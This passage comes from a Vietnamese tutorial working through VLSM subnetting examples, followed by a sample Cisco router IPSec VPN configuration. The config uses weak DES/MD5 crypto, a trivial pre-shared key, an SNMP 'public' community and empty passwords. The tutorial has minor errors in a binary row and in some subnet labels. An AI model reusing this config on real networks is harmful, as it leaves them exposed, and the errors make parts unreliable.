&  số Subnet (mạng con) được tạo ra là: 2m = 22 = 4 
với SM thay đổi từ /25 thành /27 (các bit trong khoảng này của X23 liên quan đến Octet
thứ 4) nên ta có các mạng con mới sinh ra từ X23:
                                                                           | Octet 4 |
Mạng X231:    10101100.00100011.00000011.00000000  -> 172.35.3.0/27  
Mạng X232:    10101100.00100011.00000011.00100000  -> 172.35.3.32/27
Mạng X233:    10101100.00100011.00000011.01000000  -> 172.35.3.64/27
Mạng X234:    10101100.00100011.00000011.01100000  -> 172.35.3.96/27

------------------------------------------------------------------------------------------------------------

=> lấy X231: 172.35.3.0/27 cấp cho mạng D: 30 host
+ Lấy X232 chia cho các mạng E: 2 host, F: 2 host, G: 2 host
Tương tự trên, theo công thức:  2n - 2 ≥ 2 => n=2 => m = 32-27-2 = 3
=> SM’ (Subnet Mask mới) = SM (Subnet Mask cũ) + m = 27 +3 = 30 ( viết tắt là /30)
&  số Subnet (mạng con) được tạo ra là: 2m = 23 = 8
với SM thay đổi từ /27 thành /30 (các bit trong khoảng này của X232 liên quan đến Octet
thứ 4) nên ta có các mạng con mới sinh ra từ X232 là:
                                                                              | Octet 4 |
Mạng X2321:    10101100.00100011.00000011.00100000  -> 172.35.3.32/30
Mạng X2322:    10101100.00100011.00000011.00100100  -> 172.35.3.36/30
Mạng X2323:    10101100.00100011.00000011.00101000  -> 172.35.3.40/30
………………… vân vân ………………….
Mạng X2327:    10101100.00100011.00000011.00111000  -> 172.35.3.56/30
Mạng X2328:    10101100.00100011.00000011.00111100  -> 172.35.3.60/30

=> lấy mạng Mạng X2321: 172.35.3.32/30 cấp cho mạng E: 2 host
=> lấy mạng Mạng X2322: 172.35.3.36/30 cấp cho mạng F: 2 host
=> lấy mạng Mạng X2323: 172.35.3.40/30 cấp cho mạng G: 2 host

KẾT LUẬN

- Sau khi cấp các địa chỉ mạng con cho các mạng A, B, C, D, E, F, G sẽ còn dư các
mạng chưa được sử dụng (để giành khi cần ta có thể sử dụng để cấp phát hoặc chia
nhỏ tiếp). Phương pháp VLSM này sẽ giúp ta kiểm soát được phần địa chỉ dư thừa
chưa được sử dụng.
- Bảng sơ đồ tổng kết như sau: 

Tên
mạ
ng
Số
host
yêu
cầu
Địa  chỉ
mạng
Pref
ix
Subnet
Mask
Giải  địa  chỉ  khả
dụng
Địa  chỉ
Broadcast
A  320  172.35.0.0  /23  255.255.254
.0
172.35.0.1  -
172.35.1.254
172.35.1.25
5
B  115  172.35.2.0  /25  255.255.255
.128
172.35.2.1  -
172.35.2.126
172.35.2.12
7
C  80  172.35.2.12
8
/25  255.255.255
.128
172.35.2.129  -
172.35.2.254
172.35.2.25
5
D  30  172.35.3.0  /27  255.255.255
.224
172.35.3.1  -
172.35.3.30
172.35.3.31
E  2  172.35.3.32  /30  255.255.255
.252
172.35.3.33  -
172.35.3.34
172.35.3.35

F  2  172.35.3.36  /30  255.255.255
.252
172.35.3.37  -
172.35.3.38
172.35.3.39

G  2  172.35.3.40  /30  255.255.255
.252
172.35.3.41  -
172.35.3.42
172.35.3.43

------------------------------------------------------------------------------------------------------------

(Có thể vào www.vlsm-calc.net để kiểm tra xem kết quả có trùng, đúng hay không)

- Sơ đồ tổng quát cho các mạng như sau:

172.35.0.0/16   (Giải địa chỉ ban đầu)
 172.35.0.0/23 
172.35.2.0/23   -> (Dùng để chia tiếp)
172.35.4.0/23    |  172.35.2.0/25
 …..                   |  172.35.2.128/25
172.35.252.0/23|  172.35.3.0/25 -> (Dùng để chia tiếp)
172.35.254.0/23| 172.35.3.128/25  | 172.35.3.0/27
                  172.35.3.32/27 ->(Dùng để chia tiếp)
                  172.35.3.64/27|   |172.35.3.32/30
                  172.35.3.96/27|   |172.35.3.36/30
                | 172.35.3.40/30
                …
                |172.35.3.56/30
                |172.35.3.60/30

+ Chú ý: Địa chỉ in đậm chính là địa chỉ đã được cấp phát, địa chỉ bị gạch chân & có dấu
“->” là đã bị chia, các địa chỉ còn lại là địa chỉ còn dư thừa có thể dùng cho việc khác.
VÍ DỤ MẪU 2: Cho giải địa chỉ X: 10.0.0.0/12
, hãy Subnet để cấp cho các mạng con:
-A: 510 host
-B: 370 host
-C: 217 host
-D: 156 host
-E: 80 host
-F: 40 host
-G: 2 host
-H: 2 host
-I: 2 host
-J: 2 host
 theo phương pháp VLSM?

------------------------------------------------------------------------------------------------------------

Hướng dẫn giải:

*Bước 1: Theo VLSM, ta sắp xếp số mạng yêu cầu từ cao xuống thấp, được:
A: 510 host
B: 370 host
C: 217 host
D: 156 host
E: 80 host
F: 40 host
G: 2 host
H: 2 host
I: 2 host
J: 2 host
*Bước 2: Thực hiện chia giải địa chỉ ban đầu lần lượt cho mạng yêu cầu số host cao nhất
đến mạng yêu cầu thấp nhất.
 Theo đề bài cho mạng X: 10.0.0.0/12  00001010.00000000.00000000.00000000
->  số bit thuộc Net_id là  12,  và  số bit thuộc Host_id là  32-12  =  20  (chính  là  các  bit  bị
gạch chân- việc thay đổi giá trị từ 0 thành 1 và vị trí các bit này sẽ sinh ra các mạng con
mới)

- Đầu tiên, theo VLSM ta chia X cho mạng A: 510 host
Theo công thức: 2n - 2 ≥ 510 => n=9 => m = 32 – 12 – 9 = 11
-> SM’ = 12 + 11 = 23 (viết tắt là /23)
   & Số Subnet mới được sinh ra = 2m = 211 = 2048  
Ta thấy từ SM ban đầu là /12 chuyển lên /23 chúng ta phải thay đổi mỗi bit thuộc m để
tạo mạng con, tính từ trái sang phải, các bit m từ khoảng bit thứ 12 đến bit thứ 23 thuộc 2
octet 2 và octet 3, do đó ta có:

                                    | Octet 2|  | Octet 3 |
X->   X1: 00001010.00000000.00000000.00000000 <-> 10.0.0.0/23 (cấp cho mạng A)
          X2: 00001010.00000000.00000010.00000000 <-> 10.0.2.0/23 (dùng chia tiếp)
          X3: 00001010.00000000.00000100.00000000 <-> 10.0.4.0/23 
          X4: 00001010.00000000.00000110.00000000 <-> 10.0.6.0/23 
              …. Vân vân ….
    X2047: 00001010.00001111.11111100.00000000 <-> 10.15.252.0/23 
    X2048: 00001010.00001111.11111110.00000000 <-> 10.15.254.0/23 

- Tiếp theo, lấy mạng X2 (là mạng lớn nhất tiếp theo mạng vừa bị cấp) chia cho mạng B
Theo công thức: 2n  - 2 ≥ 370 => n=9 => m = 32 – 23 – 9 = 0 (chú ý, theo phương pháp
vlsm thì m không bao giờ nhận giá trị âm) -> vừa đủ để cấp cho mạng B
- Tiếp theo, lấy mạng X3 chia cho mạng C: 217 host
Theo công thức: 2n - 2 ≥ 217 => n=8 => m = 32 – 23 – 8 = 1
-> SM’ = 23 + 1 = 24 (viết tắt là /24)
   & Số Subnet mới được sinh ra = 2m = 21 = 2 

------------------------------------------------------------------------------------------------------------

Ta thấy từ SM ban đầu là /23 chuyển lên /24 chúng ta phải thay đổi bit thuộc m để tạo
mạng con, tính từ trái sang phải, bit m từ khoảng bit thứ 23 đến bit thứ 24 thuộc  octet 3,
do đó ta có các mạng con được sinh ra từ X3 là:
                                           | Octet 3 |
X31: 00001010.00000000.00000100.00000000 <-> 10.0.4.0/24 (cấp cho mạng C)
X32: 00001010.00000000.00000101.00000000 <-> 10.0.5.0/24 
- Tiếp theo, lấy mạng X32 chia cho mạng D: 156 host
Theo công thức: 2n  - 2 ≥ 156 => n=8 => m = 32 – 24 – 8 = 0 (chú ý, theo phương pháp
vlsm thì m không bao giờ nhận giá trị âm) -> vừa đủ để cấp cho mạng D
- Quay lại  lấy mạng X4 (vì các  mạng con nhỏ đã dùng hết rồi) để chia cho mạng E: 80
host, Theo công thức: 2n - 2 ≥ 80 => n=7 => m = 32 – 23 – 7 = 2 
-> SM’ = 23 + 2 = 25 (viết tắt là /25)
   & Số Subnet mới được sinh ra = 2m = 22 = 4 
Ta thấy từ SM ban đầu là /23 chuyển lên /25  chúng ta phải thay đổi các  bit thuộc m để
tạo mạng con, tính từ trái sang phải, các bit m từ khoảng bit thứ 23 đến bit thứ 25 thuộc 
octet 3 và octet 4, do đó ta có các mạng con được sinh ra từ X4 là:
                                            | Octet 3|  | Octet 4 |
X41: 00001010.00000000.00000110.00000000 <-> 10.0.6.0/25 (cấp cho mạng E)
X42: 00001010.00000000.00000110.10000000 <-> 10.0.6.128/25 
X43: 00001010.00000000.00000111.00000000 <-> 10.0.7.0/25 
X44: 00001010.00000000.00000110.00000000 <-> 10.0.7.128/25 
- Tiếp theo, lấy mạng X42 chia cho mạng F: 40 host
Theo công thức: 2n - 2 ≥ 40 => n=6 => m = 32 – 25 – 6 = 1 
-> SM’ = 25 + 1 = 26 (viết tắt là /26)
   & Số Subnet mới được sinh ra = 2m = 21 = 2 
Ta thấy từ SM ban đầu là /25 chuyển lên /26 chúng ta phải thay đổi bit thuộc m để tạo
mạng con, tính từ trái sang phải, bit m từ khoảng bit thứ 25 đến bit thứ 26 thuộc  octet 4,
do đó ta có các mạng con được sinh ra từ X42 là:
                                                             | Octet 4 |
X421: 00001010.00000000.00000110.10000000 <-> 10.0.6.128/26 (cấp cho mạng F)
X422: 00001010.00000000.00000110.11000000 <-> 10.0.6.192/26 
- Cuối cùng, lấy mạng X422 chia cho các mạng cần 2 host là G, H, I, J
Theo công thức: 2n - 2 ≥ 2 => n=2 => m = 32 – 26 – 2 = 4
-> SM’ = 26 + 4 = 30 (viết tắt là /30)
   & Số Subnet mới được sinh ra = 2m = 24 = 16
Ta thấy từ SM ban đầu là /26 chuyển lên /30  chúng ta phải thay đổi các bit thuộc m để
tạo mạng con, tính từ trái sang phải, các bit m từ khoảng bit thứ 26 đến bit thứ 30 thuộc 
octet 4, do đó ta có các mạng con được sinh ra từ X422 là:
                                            
------------------------------------------------------------------------------------------------------------

      | Octet 4 |
  X4221: 00001010.00000000.00000110.11000000 <-> 10.0.6.192/30 (cấp cho mạng G)
  X4222: 00001010.00000000.00000110.11000100 <-> 10.0.6.196/30 (cấp cho mạng H)
  X4223: 00001010.00000000.00000110.11001000 <-> 10.0.6.200/30 (cấp cho mạng I)
  X4224: 00001010.00000000.00000110.11001100 <-> 10.0.6.204/30 (cấp cho mạng J)
                             ….. vân vân ……
X42215: 00001010.00000000.00000110.11111000 <-> 10.0.6.248/30 (cấp cho mạng G)
X42216: 00001010.00000000.00000110.11111100 <-> 10.0.6.252/30 (cấp cho mạng G)

KẾT LUẬN

- Sau khi cấp các địa chỉ mạng con cho các mạng A, B, C, D, E, F, G, H, I, J sẽ còn
dư các mạng chưa được sử dụng (để giành khi cần ta có thể sử dụng để cấp phát hoặc
chia  nhỏ tiếp). Phương pháp VLSM này sẽ giúp ta kiểm soát được phần địa chỉ dư
thừa chưa được sử dụng.
- Bảng sơ đồ tổng kết như sau: 

Tên
mạ
ng
Số
host
yêu
cầu
Địa  chỉ
mạng
Pref
ix
Subnet
Mask
Giải  địa  chỉ  khả
dụng
Địa  chỉ
Broadcast
A  510  10.0.0.0  /23  255.255.254
.0
10.0.0.1-
10.0.1.254
10.0.1.255
B  370  10.0.2.0  /23  255.255.254
.0
10.0.2.1-
10.0.3.254
10.0.3.255
C  217  10.0.4.0   /24  255.255.255
.0
10.0.4.1  -
10.0.4.254
10.0.4.255
D  156  10.0.5.0  /24  255.255.255
.0
10.0.5.1  -
10.0.5.254
10.0.5.255
E  80  10.0.6.0  /25  255.255.255
.128
10.0.6.1  -
10.0.6.126
10.0.6.127
F  40  10.0.6.128  /26  255.255.255
.192
10.0.6.129  -
10.0.6.190
10.0.6.191
G  2  10.0.6.192  /30  255.255.255
.252
10.0.6.193  -
10.0.6.194
10.0.6.195
H  2  10.0.6.196  /30  255.255.255
.252
10.0.6.197  -
10.0.6.198
10.0.6.199
I  2  10.0.6.200  /30  255.255.255
.252 
10.0.6.201  -
10.0.6.202
10.0.6.203
J  2  10.0.6.204   /30  255.255.255
.252
10.0.6.205  -
10.0.6.206
10.0.6.207
 ------------------------------------------------------------------------------------------------------------

Sơ đồ chia tổng quát xuất phát từ địa chỉ X là:

 
Ghi chú: địa chỉ in đậm chính là địa chỉ được cấp phát cho các mạng A, B, C, D, E, F,G,
H,  I, J tương ứng theo chiều từ trên xuống dưới & từ trái qua phải
(Các  bài  toán  kiểu tương tự trên,  chúng  ta  có  thể áp dụng theo ví dụ mẫu bên trên để
subnet mạng con)

LAN to LAN VPN - Vigor Router to Cisco 1702 with IPSec tunnel - Setup Cisco 1702

Setup Cisco with Commands
version 12.2
no parser cache
no service single-slot-reload-enable
service timestamps debug uptime
service timestamps log uptime
service password-encryption
hostname Cisco1720
logging rate-limit console 10 except errors
enable password 
memory-size iomem 15
mmi polling-interval 60
no mmi auto-configure
no mmi pvc
mmi snmp-timeout 180
ip subnet-zero
no ip domain-lookup
ip dhcp pool 1
network 192.168.2.0 255.255.255.0
default-router 192.168.2.1
ip audit notify log
ip audit po max-events 100
ip ssh time-out 120
ip ssh authentication-retries 3
no ip dhcp-client network-discovery
crypto isakmp policy 1
hash md5
authentication pre-share
lifetime 3600
crypto isakmp key 123 address 203.69.175.28
crypto ipsec transform-set cm-transformset-1 esp-des esp-md5-hmac
crypto mib ipsec flowmib history tunnel size 200
crypto mib ipsec flowmib history failure size 200
crypto map cm-cryptomap local-address Ethernet0
crypto map cm-cryptomap 1 ipsec-isakmp
set peer 203.69.175.28
set transform-set cm-transformset-1
match address 100
interface Ethernet0
description connected to Internet
ip address 210.243.151.181 255.255.255.240
half-duplex
crypto map cm-cryptomap
interface FastEthernet0
description connected to EthernetLAN_1
ip address 192.168.2.1 255.255.255.0
speed auto
router rip
version 1
passive-interface Ethernet0
network 210.243.151.176
network 192.168.2.0
no auto-summary
ip classless
ip route 0.0.0.0 0.0.0.0 Ethernet0
no ip http server
access-list 100 permit ip 192.168.2.0
0.0.0.255
192.168.1.0 
0.0.0.255
snmp-server community public RO
line con 0
exec-timeout 0 0
password 7 06575D7218
login
line aux 0
line vty 0 4
password 
login
line vty 5 15
login
no scheduler allocate
end